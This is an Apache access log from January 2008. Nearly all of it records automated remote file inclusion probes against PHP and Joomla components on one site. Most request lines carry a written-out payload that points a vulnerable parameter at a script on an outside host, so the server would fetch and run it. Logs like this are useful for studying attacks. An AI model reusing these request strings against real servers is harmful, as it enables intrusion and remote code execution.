88.131.106.16 - - [13/Jan/2008:11:22:50 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:23:01 -0800] "GET /logs/access_070917.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:23:18 -0800] "GET /vwar/admin/?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:11:23:52 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:24:10 -0800] "GET //?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:25:09 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:25:26 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:25:47 -0800] "GET /logs/access_071014.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:11:26:53 -0800] "GET /logs/access_071014.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:11:26:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [13/Jan/2008:11:26:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:27:12 -0800] "GET /logs/access_070910.log/index1.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:27:12 -0800] "GET /index1.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:27:12 -0800] "GET /logs/index1.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:27:28 -0800] "GET /logs/access_070924.log/index1.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.160.16.3 - - [13/Jan/2008:11:27:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.160.16.3 - - [13/Jan/2008:11:27:40 -0800] "GET //skin/zero_vote/error.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
140.123.106.131 - - [13/Jan/2008:11:27:44 -0800] "GET /logs/access_071210.log/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.123.106.131 - - [13/Jan/2008:11:27:44 -0800] "GET /tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.123.106.131 - - [13/Jan/2008:11:27:45 -0800] "GET /logs/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:28:11 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:11 -0800] "GET /logs/access_071105.log/index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:12 -0800] "GET /index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:12 -0800] "GET /logs/index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:31 -0800] "GET /logs/access_071028.log/index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:33 -0800] "GET /logs/access_070716.log/index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:33 -0800] "GET /index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:33 -0800] "GET /logs/index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:28:34 -0800] "GET /logs/access_070730.log/index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.224.45 - - [13/Jan/2008:11:29:05 -0800] "GET /logs/access_071210.log/main.php?id=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.224.45 - - [13/Jan/2008:11:29:08 -0800] "GET /main.php?id=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.224.45 - - [13/Jan/2008:11:29:09 -0800] "GET /logs/main.php?id=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.244.196.210 - - [13/Jan/2008:11:30:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.244.196.210 - - [13/Jan/2008:11:30:06 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/mobileuser.02473235/dew/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:30:08 -0800] "GET /logs/index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:30:08 -0800] "GET /index1.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:30:21 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:30:28 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:11:30:58 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:31:02 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:31:03 -0800] "GET /vwar/admin/?vwar_root=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:31:03 -0800] "GET /logs/vwar/admin/?vwar_root=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.98.246.23 - - [13/Jan/2008:11:31:17 -0800] "GET /logs/access_070826.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.246.23 - - [13/Jan/2008:11:31:17 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.246.23 - - [13/Jan/2008:11:31:17 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.134.164 - - [13/Jan/2008:11:31:21 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:31:33 -0800] "GET /logs/index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:31:33 -0800] "GET /index2.php?x=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:31:36 -0800] "GET /logs/access_070903.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:32:22 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:32:22 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fachin-friedrich.de/contenido/external/frontend/me.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:32:53 -0800] "GET /logs/access_071231.log/index2.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:32:53 -0800] "GET /index2.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:32:53 -0800] "GET /logs/index2.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:33:25 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:33:27 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:33:27 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:33:59 -0800] "GET /logs/access_071203.log/index2.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.246.23 - - [13/Jan/2008:11:34:04 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.80.193.42 - - [13/Jan/2008:11:34:05 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc5; i686 Linux; 20021221)" "www.galf.org"
69.50.209.169 - - [13/Jan/2008:11:34:13 -0800] "GET /logs/access_070826.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.50.209.169 - - [13/Jan/2008:11:34:13 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.50.209.169 - - [13/Jan/2008:11:34:13 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:34:23 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:34:23 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:34:24 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:34:24 -0800] "GET /logs/vwar/admin/?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:34:25 -0800] "GET /logs/access_070820.log/index3.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:34:25 -0800] "GET /index3.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:34:25 -0800] "GET /logs/index3.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.90.101.70 - - [13/Jan/2008:11:34:32 -0800] "GET /logs/access.log/index3.php?p=http://www.gruppomulti.ch/documents/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:34:50 -0800] "GET /logs/access_071028.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:34:51 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:35:05 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.50.209.169 - - [13/Jan/2008:11:35:29 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:35:58 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:35:59 -0800] "GET //?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:35:59 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 5478 "-" "libwww-perl/5.64" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:36:15 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:36:21 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:36:24 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:36:37 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:37:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:37:41 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
146.83.144.170 - - [13/Jan/2008:11:37:55 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:38:08 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 5478 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:38:09 -0800] "GET //?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.64" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:38:48 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:11:38:48 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:38:58 -0800] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:38:58 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:39:31 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:39:35 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.114.21 - - [13/Jan/2008:11:39:57 -0800] "GET /logs//eva/index.php3?perso=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.114.21 - - [13/Jan/2008:11:39:57 -0800] "GET //eva/index.php3?perso=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:39:58 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.114.21 - - [13/Jan/2008:11:40:00 -0800] "GET /logs/access_071231.log//eva/index.php3?perso=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:40:08 -0800] "GET /logs/access_070917.log//?CONFIG_EXT[LIB_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:40:10 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:11:40:43 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:11:40:43 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.184.18.198 - - [13/Jan/2008:11:41:02 -0800] "GET /logs/access_070716.log/contrib/mx_glance_sdesc.php?mx_root_path=http://kewlnet.int.pl/~laryflynt/.cd/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.184.18.198 - - [13/Jan/2008:11:41:02 -0800] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://kewlnet.int.pl/~laryflynt/.cd/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.184.18.198 - - [13/Jan/2008:11:41:02 -0800] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://kewlnet.int.pl/~laryflynt/.cd/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:41:07 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:41:16 -0800] "GET /logs/access_071119.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.141.167 - - [13/Jan/2008:11:41:55 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.141.167 - - [13/Jan/2008:11:41:56 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:41:59 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:41:59 -0800] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 200 5478 "-" "libwww-perl/5.808" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:42:21 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:42:22 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:42:38 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:42:39 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
